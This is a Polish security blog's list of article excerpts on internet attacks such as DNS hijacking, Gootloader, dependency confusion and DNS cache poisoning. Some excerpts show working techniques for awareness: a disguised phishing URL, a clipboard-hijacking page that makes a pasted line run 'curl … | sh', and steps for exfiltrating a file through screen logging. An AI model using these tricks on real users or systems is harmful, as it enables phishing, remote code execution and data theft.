Napisał: Patryk Krawaczyński
04/10/2022 w Ataki Internetowe
C
yberprzestępcy często wykorzystują nazwy domen do różnych niecnych celów: do komunikacji z serwerami C&C, dystrybucji złośliwego oprogramowania, oszustw finansowych i phishingu. Dokonując tych działań przestępcy mają do wyboru albo kupować nowe nazwy domen (złośliwa rejestracja na fałszywe dane) albo skompromitować już istniejące (przechwytując rekordy DNS). Przechwytywanie DNS obejmuje: kradzież danych logowania właściciela domeny u rejestratora lub dostawcy usługi DNS, włamanie się do rejestratora lub dostawcy usługi DNS, włamanie się do samego serwera DNS, zatruwanie pamięci serwerów DNS lub przejęcie nieużywanych subdomen.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
07/07/2022 w Ataki Internetowe, Bezpieczeństwo
G
ootloader, czyli usługa wstępnego dostępu do (firmowych) sieci dla cyberprzestępców ostatnio rozszerzyła swój zakres działalności o różne cele na całym świecie. Przypomnijmy: w 2014 roku po raz pierwszy został zauważony trojan bankowy o nazwie Gootkit. Od tego czasu ewoluował, aby stać się bardziej złodziejem poufnych informacji obsługiwanym przez grupę aktorów. Nazwa 'Gootkit’ jest często używana zamiennie – zarówno w odniesieniu do złośliwego oprogramowania, jak i do samej grupy. W marcu 2021 roku firma Sophos jako pierwsza zidentyfikowała szersze możliwości tego oprogramowania i nazwała go GootLoader. Ten oparty o Javascript framework pierwotnie przeznaczony do infekcji Gootkitem w coraz większym stopniu zaczął dostarczać szerszą gamę złośliwego oprogramowania (w tym ransomware). Wczesna aktywność kampanii platformy Gootloader została po raz pierwszy zauważona przez analityka zagrożeń z firmy Proofpoint pod koniec 2020 roku, a następnie zbadana i opisana przez ASEC, Malwarebytes i TrendMicro.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
28/02/2022 w Ataki Internetowe
D
zisiaj Pinaki zwrócił uwagę na sposób generowania adresów URL zawartych w phishingu wymierzonego w obywateli Ukrainy, który jako przynęty używał możliwość uzyskania wiz poprzez internet. Linki posiadające poniższy format były przekazywane za pomocą różnych wiadomości e-mail oraz czatach:
https://evisa.mfa.gov.ua:login@%6E%66%73%65%63%2E%70%6C
Szybki rzut oka na ten link nawet płynnie korzystającego z internetu użytkownika może go przekonać, że prowadzi on do portalu logowania serwisu evisa.mfa.gov.ua. Ale tak niestety nie jest. Kliknięcie linku w przeglądarce zaprowadzi nas do domeny: https://nfsec.pl. Dlaczego? Spójrzmy jak wygląda format adresu URL (zgodnie z definicją w RFC 1808, sekcja 2.1):
<schemat>://<nazwa_użytkownika>:<hasło>@<host>:<port>
Jest to dość dobrze znana technika w phishingu, w której domena jest zakodowana szesnastkowo. Jeśli rozłożymy ten format na czynniki pierwsze to otrzymamy:
- https:// – protokół / schemat
- evisa.mfa.gov.ua – nazwa użytkownika
- login – hasło
- nfsec.pl – docelowa strona internetowa (zakodowana szesnastkowo – to na nią zostaniemy przekierowani)
Dowód koncepcji: https://evisa.mfa.gov.ua:login@%6E%66%73%65%63%2E%70%6C
Najeżdżając kursorem na powyższy link możemy zaobserwować prawdziwy adres URL wyświetlany w lewym dolnym rogu. Zawsze należy pamiętać o tej czynności przed kliknięciem w link.
Więcej informacji: What does netloc mean?, Phishing attempts on Ukraine,
Napisał: Patryk Krawaczyński
11/02/2021 w Ataki Internetowe
Z
amieszanie w zależnościach pakietów (ang. dependency confusion) jest nowatorką metodą ataku na łańcuch dostaw (ang. supply chain attack). Atak na łańcuch dostaw (zwany także atakiem od trzeciej strony) ma miejsce, gdy ktoś infiltruje Twój system za pośrednictwem zewnętrznego partnera lub dostawcy, który ma dostęp do Twoich systemów i danych. Na przykład Twoja firma korzysta z jego oprogramowania lub usług, które dają mu dostęp do Twojej sieci. Gdy dochodzi do przełamania zabezpieczeń u partnera – atakujący jest w stanie rozprzestrzenić wektor ataku na wszystkich klientów danej firmy. Znaczenie tego ataku dla typowego przedsiębiorstwa w ciągu ostatnich kilku lat znacznie się zmieniło, ponieważ coraz więcej dostawców i usługodawców się integruje i dotyka wzajemnie wrażliwych danych. Ryzyko związane z łańcuchem dostaw nigdy nie było wyższe ze względu na nowe rodzaje ataków, co pokazuje zamieszanie w zależnościach pakietów. Rosnąca świadomość społeczna na temat zagrożeń powoli spycha napastników na nowy kierunek masowego rażenia. Dobrym przykładem jest niedawny atak SolarWinds.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
30/01/2021 w Ataki Internetowe
E
cha odkrycia ataku Kaminsky’ego z 2008 roku wciąż odbijają się po internecie. Badacze z JSOF odkryli 7 luk znalezionych w powszechnie używanym oprogramowaniu (około 40 producentów urządzeń sieciowych, jak również w głównych dystrybucjach Linuksa) do przekazywania zapytań DNS i przechowywaniu w pamięci podręcznej ich odpowiedzi – Dnsmasq. Od prawie dekady bardzo duża część internetu nadal polega na DNS jako źródle integralności dlatego ataki na tą usługę zagrażają dużym segmentom sieci. Luki w DNSpooq obejmują podatności związane z zatruwaniem pamięci podręcznej DNS, a także potencjalnej możliwości wykonania kodu. Lista urządzeń korzystających z Dnsmasq jest długa i zróżnicowana. Zgodnie z przeprowadzonymi badaniami użytkownikami tego rozwiązania są takie firmy jak: Cisco, Android, Aruba, Technicolor, Siemens, Ubiquiti, Comcast i inne. W zależności od tego jak używają Dnsmasq urządzenia te mogą być bardziej lub mniej dotknięte odkrytymi podatnościami.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
15/11/2020 w Ataki Internetowe
N
aukowcy z Uniwersytetu Tsinghua i Uniwersytetu Kalifornijskiego na tegorocznej konferencji ACM CCS przedstawili nową metodę, którą można użyć do przeprowadzania ataków polegających na zatruwaniu pamięci podręcznej DNS. Nowe odkrycie ożywia błąd z 2008 roku, który kiedyś uważano za rozwiązany na dobre. W celu zrozumienia na czym polega reinkarnacja tego ataku powróćmy do jego podstaw. DNS jest książką adresową internetu. Co się dzieje jak wpisujemy adres URL (ang. Uniform Resource Locator) np. https://nfsec.pl
do przeglądarki? Przeglądarka sprawdza swoją pamięć podręczną pod kątem wpisu DNS, aby znaleźć odpowiedni adres IP witryny. Jeśli nie zostanie znaleziony kontynuuje sprawdzanie pamięci podręcznej: systemu operacyjnego, najbliższego serwera DNS (routera lub ISP). Jeśli wpis nadal nie zostanie znaleziony to serwer DNS (routera lub ISP) inicjuje zapytanie DNS w celu znalezienia adresu IP serwera obsługującego nazwę domeny (autorytatywnego) i prosi go o podanie adresu IP szukanej domeny.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
03/11/2020 w Ataki Internetowe
K
ilka lat temu dowiedzieliśmy się, że kopiowanie poleceń bezpośrednio do terminala może mieć trochę inne konsekwencję niż byśmy mogli się spodziewać. Dzisiaj nowoczesne API Javascript pozwalają witrynie internetowej w trywialny sposób zastępowanie tego, co umieścisz w schowku, bez potwierdzenia lub zgody użytkownika. Poniżej znajduje się przykład tego, jak łatwo jest wykonać ten atak:
<html>
<head>
<title>Kopiuj wklej demo</title>
</head>
<body>
<p id="skopiujmnie">$ echo "Wklej mnie do terminala!"</p>
<script>
document.getElementById('skopiujmnie').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain', 'echo "A jednak wykonamy \
[curl https://nfsec.pl | sh]"\n');
e.preventDefault();
});
</script>
</body>
</html>
Powyższy kod możemy zapisać jako plik payload.html
, wyświetlić w przeglądarce – zaznaczyć, skopiować wyświetlony tekst i wkleić do terminala. Należy zauważyć, że nie musimy nawet naciskać klawisza ENTER po wklejeniu, ponieważ ładunek kodu zawiera znak nowej linii, która to zrobi za nas.
Więcej informacji: Don’t Copy Paste Into A Shell
Napisał: Patryk Krawaczyński
30/10/2020 w Ataki Internetowe, Bezpieczeństwo
D
ane z serwerów możemy wyprowadzać za pomocą różnego rodzaju tuneli ukrytych w protokołach. Możemy też wykorzystać do tego celu menedżer okien terminala – screen, który będzie tylko i wyłącznie zainstalowany na naszym lokalnym komputerze. Dla przykładu prześlemy plik o wielkości 1092 KB z zdalnego serwera na nasz lokalny komputer:
- Uruchamiamy polecenie
screen
na lokalnym komputerze i łączymy się z zdalnym serwerem, do którego uzyskaliśmy dostęp,
- Naciskamy sekwencję klawiszy:
Ctrl+a :
– po pojawieniu się znaku zachęty :
w lewym, dolnym rogu wpisujemy: logfile dataout.txt
i naciskamy Enter
,
- Kolejną sekwencją definiującą początek zapisu strumienia danych do pliku
dataout.txt jest:
Ctrl+a H
,
- Dane prześlemy zakodowane base64 wydając polecenie:
openssl base64 < tajne_dane.txt
,
- Kończymy strumień danych i wyzwalamy zapis pliku tą samą sekwencją, co rozpoczęcie:
Ctrl+a H
.
W drugiej konsoli teraz już na lokalnym komputerze możemy oczyścić plik wycinając pierwszą (polecenie) i ostatnią (znak zachęty powłoki) linię przy okazji dekodując plik:
cat dataout.txt | tail -n +2 | head -n -1 | openssl base64 -d
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
02/08/2020 w Ataki Internetowe
Pierwszy raz z opisem ataku HTTP Referer Spoofing spotkałem się w 2008 roku na łamach magazynu Linux+. Paweł Szcześniak opisał, jak za pomocą tej metody możemy wstrzykiwać odnośniki do agresywnej strony w innych systemach statystycznych w celu zwiększenia pozycji SEO – z oryginałem publikacji, który został udostępniony za darmo przez wydawcę możemy zapoznać się tutaj. Rozważmy teraz, jakie inne konsekwencje może nam przynieść taki atak – oraz czy istnieje możliwość jego dostosowania do dzisiejszych systemów statystycznych.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
05/02/2020 w Ataki Internetowe
P
ierwszy wariant tego ataku opierał się na systemie zgłaszania i śledzenia błędów (np. Zendesk). W drugim wariancie przewiduje on użycie Google Groups. Wstępny scenariusz ataku został odkryty już w 2018 roku przez Kenna Security we współpracy z KerbsOnSecurity. Otóż błędna konfiguracja grup dyskusyjnych Google powoduje ujawnienie poufnych wiadomości e-mail od tysięcy organizacji, w tym niektórych firm z listy Fortune 500. Wpłynęło to na wiele branż: od agencji rządowych USA, szpitali i instytucji akademickich po media znanych stacji telewizyjnych i gazet.
[ czytaj całość… ]
Ostatni komentarz :